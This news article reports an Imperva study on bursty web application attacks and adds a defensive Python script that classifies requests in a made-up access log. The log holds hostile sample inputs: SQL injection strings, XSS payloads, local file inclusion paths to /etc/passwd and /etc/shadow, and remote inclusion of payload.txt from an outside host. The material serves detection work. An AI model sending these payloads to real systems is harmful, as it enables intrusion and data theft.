Most firms have inadequate web app defences, study shows

Most firms have inadequate defences for web applications, a study has revealed.

The reason is that defences tend to be geared around attack averages, said Amichai Shulman,
chief technology officer at security firm Imperva.

But the latest Imperva Web Application Attack Report shows that half of the attack incidents on
50 web applications monitored over a six-month period were of greater than average intensity.

"Half the sample attack incidents, made up of multiple malicious requests to the web applications,
lasted more than the average of 7 minutes, 42 seconds, with some lasting up to 79 minutes," he told
Computer Weekly.

If defences are designed to cope only with the average attack incident, he said, half of the time
they will be overwhelmed by request rates that are well above that average.

The research data shows that most of the time very little happens, but every once in a while
there is an outbreak of attacks.

While the average sample web application was hit by attack incidents 33% of the time, some had
to cope with attacks 80% of the time, the study shows.

For this reason, Shulman believes organisations should base their web application defences on the
worst-case scenario, or at least on the typical attack seen in practice, rather than on the
statistical average.

Imperva's research showed that attack incident history could not be used to predict future
attacks.

"We went through all our attack data trying to find some predictive model, but we are quite
certain there is no predictability," said Shulman. "This means security teams need to be prepared
to mitigate attacks without any advance notice."

The latest research and analysis shows that, in addition to basing defences on extreme bursts of
attacks, organisations should ensure that security procedures and controls are as automated as
possible, he said, because the attack volume is typically too great to deal with manually.

"Organisations should also test their readiness to accommodate bursty threats by simulating
them, which is probably the best way to find out if your defences are adequate," said Shulman.

The study also confirmed that SQL injection remains the most commonly used attack on web
applications.

Other top attack methods include cross-site scripting (XSS), remote file inclusion (RFI) and
local file inclusion (LFI), the report said.
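The two findings above, that incidents are bursty so defences must be sized for the worst case rather than the average, and that SQL injection, XSS, RFI and LFI dominate, can be checked against an organisation's own logs. The script below is an added example, not code from the Imperva report or from Computer Weekly: it tags malicious requests in a constructed access log with indicative signatures for those four attack classes, groups them into incidents per source IP (assuming a quiet gap of 30 seconds ends an incident, a threshold chosen here for illustration), and then compares the mean incident with the longest and most intense one. The log lines, IP addresses and signature patterns are all constructed for the example; the signatures are deliberately narrow and are not a substitute for a WAF ruleset.

```python
"""Added example: classify malicious web requests, group them into attack
incidents, and compare the average incident with the worst case."""
import re
from collections import Counter
from datetime import datetime, timedelta
from statistics import mean
from urllib.parse import unquote

# Constructed log lines (timestamp, client IP, method, request path); not real traffic.
SAMPLE_LOG = """\
2013-07-01T10:00:00 198.51.100.7 GET /index.html
2013-07-01T10:00:00 198.51.100.7 GET /login?user=admin'%20OR%20'1'='1
2013-07-01T10:00:00 198.51.100.7 GET /login?user=admin'%20UNION%20SELECT%201,2--
2013-07-01T10:00:01 198.51.100.7 GET /login?user=x';%20DROP%20TABLE%20users--
2013-07-01T10:00:05 198.51.100.7 GET /item?id=1%20UNION%20SELECT%20password%20FROM%20users
2013-07-01T10:02:00 203.0.113.9 GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E
2013-07-01T10:02:10 203.0.113.9 GET /search?q=%3Cimg%20src=x%20onerror=alert(1)%3E
2013-07-01T10:03:00 192.0.2.44 GET /search?q=web%20application%20security
2013-07-01T10:30:00 198.51.100.7 GET /page?file=../../../../etc/passwd
2013-07-01T10:30:00 198.51.100.7 GET /page?file=http://203.0.113.66/include.txt
2013-07-01T10:30:00 198.51.100.7 GET /page?file=../../../../../proc/self/environ
2013-07-01T10:30:00 198.51.100.7 GET /page?file=php://filter/convert.base64-encode/resource=index.php
2013-07-01T10:30:00 198.51.100.7 GET /page?file=../../../../etc/shadow
2013-07-01T10:30:01 198.51.100.7 GET /page?file=http://203.0.113.66/payload.txt
2013-07-01T10:30:01 198.51.100.7 GET /page?file=../../../../var/log/apache2/access.log
2013-07-01T10:30:01 198.51.100.7 GET /page?file=../../../../../../windows/win.ini
"""

# Indicative signatures for the four attack classes the report names. Checked in
# this order; a path gets the first class that matches. Constructed for the example.
SIGNATURES = {
    "sqli": re.compile(r"(?i)(union\s+select|'\s*(or|and)\s+[\w']+\s*=|;\s*drop\s+table)"),
    "xss": re.compile(r"(?i)(<script\b|javascript:|on(error|load)\s*=)"),
    "rfi": re.compile(r"(?i)=(https?|ftp)://"),
    "lfi": re.compile(r"(?i)((\.\./){2,}|php://)"),
}

INCIDENT_GAP = timedelta(seconds=30)  # assumption: a quiet gap this long ends an incident


def classify(path):
    """Return the attack class for a URL-encoded request path, or None if benign."""
    decoded = unquote(path)
    for name, pattern in SIGNATURES.items():
        if pattern.search(decoded):
            return name
    return None


def parse_log(text):
    """Yield (timestamp, ip, attack_class) for each malicious request in the log."""
    for line in text.splitlines():
        ts, ip, _method, path = line.split(" ", 3)
        kind = classify(path)
        if kind:
            yield datetime.fromisoformat(ts), ip, kind


def peak_rate(times, window=timedelta(seconds=1)):
    """Largest number of requests in any one-second window starting at a request."""
    return max(sum(1 for u in times if t <= u < t + window) for t in times)


def group_incidents(requests, gap=INCIDENT_GAP):
    """Group malicious requests per source IP into incidents separated by `gap`."""
    incidents, current = [], {}
    for ts, ip, kind in sorted(requests):
        inc = current.get(ip)
        if inc is None or ts - inc["end"] > gap:
            inc = {"ip": ip, "start": ts, "end": ts, "times": [], "classes": Counter()}
            incidents.append(inc)
            current[ip] = inc
        inc["end"] = ts
        inc["times"].append(ts)
        inc["classes"][kind] += 1
    for inc in incidents:
        inc["duration_s"] = (inc["end"] - inc["start"]).total_seconds()
        inc["peak_rps"] = peak_rate(inc["times"])
    return incidents


def summarise(incidents, observed_s):
    """Average versus worst-case incident metrics, plus the share of time under attack."""
    durations = [i["duration_s"] for i in incidents]
    peaks = [i["peak_rps"] for i in incidents]
    return {
        "incidents": len(incidents),
        "mean_duration_s": mean(durations),
        "max_duration_s": max(durations),
        "mean_peak_rps": mean(peaks),
        "max_peak_rps": max(peaks),
        "busy_fraction": sum(durations) / observed_s,
    }


def analyse(text):
    """Run the whole pipeline over a log and return (incidents, summary)."""
    stamps = [datetime.fromisoformat(line.split(" ", 1)[0]) for line in text.splitlines()]
    observed_s = (max(stamps) - min(stamps)).total_seconds()
    incidents = group_incidents(parse_log(text))
    return incidents, summarise(incidents, observed_s)


if __name__ == "__main__":
    found, summary = analyse(SAMPLE_LOG)
    for inc in found:
        print(f"{inc['ip']:14} {inc['start']:%H:%M:%S} {inc['duration_s']:4.0f}s "
              f"peak {inc['peak_rps']} req/s {dict(inc['classes'])}")
    print(summary)
```

On the constructed log the mean peak rate is under 3 requests per second, while the LFI/RFI burst at 10:30 hits 5 requests per second, which is the gap between "average" and "worst case" that the report warns about; sizing blocking or rate-limiting capacity to `max_peak_rps` rather than `mean_peak_rps` is the practical reading of Shulman's advice. Replaying a log like this at the observed peak rate against a staging environment is also a simple way to do the readiness test he recommends.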
